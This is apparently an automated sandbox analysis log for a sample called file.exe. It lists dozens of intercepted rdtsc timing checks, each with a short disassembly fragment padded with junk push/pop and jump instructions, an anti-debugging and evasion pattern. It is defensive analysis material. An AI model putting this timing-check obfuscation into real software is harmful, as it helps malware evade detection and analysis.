                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3992 second address: 12F39A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF8E8F833BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3D5D second address: 12F3D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3D61 second address: 12F3D70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F833BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3D70 second address: 12F3D76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3D76 second address: 12F3D86 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3D86 second address: 12F3D8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3D8B second address: 12F3D91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F456D second address: 12F45CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F8DBBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FF8E8F8DBB8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 cld 0x00000027 mov cx, 3151h 0x0000002b xor dx, EF7Eh 0x00000030 lea eax, dword ptr [ebp+124850AFh] 0x00000036 mov edi, 4F40D58Dh 0x0000003b nop 0x0000003c pushad 0x0000003d pushad 0x0000003e push ebx 0x0000003f pop ebx 0x00000040 pushad 0x00000041 popad 0x00000042 popad 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007FF8E8F8DBBAh 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F45CC second address: 12F45E9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF8E8F833B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF8E8F833BFh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F45E9 second address: 12F45F3 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF8E8F8DBBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F45F3 second address: 12F464E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007FF8E8F833B8h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 lea eax, dword ptr [ebp+1248506Bh] 0x00000027 movzx edi, bx 0x0000002a mov dword ptr [ebp+122D22D0h], ecx 0x00000030 push eax 0x00000031 pushad 0x00000032 jns 00007FF8E8F833CAh 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132317E second address: 13231B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d push ebx 0x0000000e jmp 00007FF8E8F8DBBFh 0x00000013 jmp 00007FF8E8F8DBBDh 0x00000018 pop ebx 0x00000019 pushad 0x0000001a push edi 0x0000001b pop edi 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13235E1 second address: 1323609 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F833BEh 0x00000007 jmp 00007FF8E8F833C2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1323609 second address: 1323626 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F8DBBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d jne 00007FF8E8F8DBB6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D21B7 second address: 12D21C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jng 00007FF8E8F833B6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1323A1E second address: 1323A30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF8E8F8DBB6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1323A30 second address: 1323A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF8E8F833B6h 0x0000000a jnc 00007FF8E8F833B6h 0x00000010 popad 0x00000011 jc 00007FF8E8F833C6h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132D491 second address: 132D4CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8E8F8DBC4h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b jmp 00007FF8E8F8DBC7h 0x00000010 jmp 00007FF8E8F8DBBCh 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132D4CF second address: 132D4D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C36E second address: 132C374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C374 second address: 132C37C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C37C second address: 132C3A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FF8E8F8DBC4h 0x0000000d jg 00007FF8E8F8DBB6h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C3A3 second address: 132C3BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8E8F833C3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C3BA second address: 132C3BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C4FF second address: 132C503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C67D second address: 132C69B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF8E8F8DBC1h 0x0000000c jns 00007FF8E8F8DBB6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C69B second address: 132C69F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C69F second address: 132C6BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF8E8F8DBC7h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C6BE second address: 132C6C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132CD71 second address: 132CD9E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF8E8F8DBB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007FF8E8F8DBD5h 0x00000012 jmp 00007FF8E8F8DBC9h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133310C second address: 1333115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1333115 second address: 1333121 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF8E8F8DBBEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1332096 second address: 13320A2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13320A2 second address: 13320B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F8DBBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1336692 second address: 13366BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FF8E8F833B6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007FF8E8F833C5h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pop edx 0x0000001a pop eax 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13366BD second address: 13366C7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF8E8F8DBBEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1336825 second address: 133682A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133907C second address: 1339094 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnl 00007FF8E8F8DBB6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007FF8E8F8DBBCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1339094 second address: 1339098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1338C09 second address: 1338C4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F8DBC7h 0x00000007 jmp 00007FF8E8F8DBC4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007FF8E8F8DBC4h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1338D97 second address: 1338D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1338D9B second address: 1338DCD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F8DBC7h 0x00000007 jmp 00007FF8E8F8DBC7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1338DCD second address: 1338DDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FF8E8F833B6h 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133CC7F second address: 133CCB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F8DBC2h 0x00000007 jne 00007FF8E8F8DBB8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF8E8F8DBC8h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133C448 second address: 133C452 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF8E8F833B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133C9C0 second address: 133C9CE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF8E8F8DBB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133C9CE second address: 133C9D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1340A97 second address: 1340AB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F8DBC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1340AB5 second address: 1340AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1340AB9 second address: 1340ABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1340ABD second address: 1340ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FF8E8F833C4h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133FD55 second address: 133FD65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push esi 0x00000008 pop esi 0x00000009 je 00007FF8E8F8DBB6h 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133FD65 second address: 133FD6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133FD6B second address: 133FD71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133FED7 second address: 133FF09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF8E8F833B6h 0x0000000a jc 00007FF8E8F833C8h 0x00000010 jo 00007FF8E8F833BAh 0x00000016 popad 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133FF09 second address: 133FF0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133FF0D second address: 133FF11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133FF11 second address: 133FF17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13401A8 second address: 13401AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13401AC second address: 13401C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF8E8F8DBB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d je 00007FF8E8F8DBB6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13401C1 second address: 13401E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8E8F833BCh 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c push esi 0x0000000d jno 00007FF8E8F833B6h 0x00000013 pop esi 0x00000014 popad 0x00000015 push ecx 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13401E1 second address: 13401F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FF8E8F8DBB6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344C87 second address: 1344C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344C8D second address: 1344C93 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344DB9 second address: 1344DDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8E8F833C8h 0x00000009 popad 0x0000000a jne 00007FF8E8F833C2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344DDE second address: 1344DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344DE4 second address: 1344DEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13450D4 second address: 13450D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13450D8 second address: 13450E6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF8E8F833B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13450E6 second address: 13450EC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1345260 second address: 1345280 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F833C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FF8E8F833BEh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134554A second address: 134555A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FF8E8F8DBB6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1346061 second address: 134607A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8E8F833C4h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134607A second address: 134608E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF8E8F8DBBFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134C07B second address: 134C07F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134C07F second address: 134C085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134C364 second address: 134C36C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134C36C second address: 134C380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8E8F8DBBFh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134CC1A second address: 134CC20 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134CF22 second address: 134CF26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134CF26 second address: 134CF2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134CF2C second address: 134CF70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push ecx 0x00000008 pushad 0x00000009 jmp 00007FF8E8F8DBC7h 0x0000000e pushad 0x0000000f popad 0x00000010 jo 00007FF8E8F8DBB6h 0x00000016 jmp 00007FF8E8F8DBC8h 0x0000001b popad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D532 second address: 134D53E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D53E second address: 134D544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D544 second address: 134D54F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D54F second address: 134D553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D553 second address: 134D573 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F833BCh 0x00000007 jnl 00007FF8E8F833B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007FF8E8F833B6h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134DDA7 second address: 134DDAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134DDAB second address: 134DDB7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF8E8F833B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1358471 second address: 13584A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF8E8F8DBC8h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF8E8F8DBC3h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13584A5 second address: 13584A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1357640 second address: 1357644 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1357900 second address: 1357906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
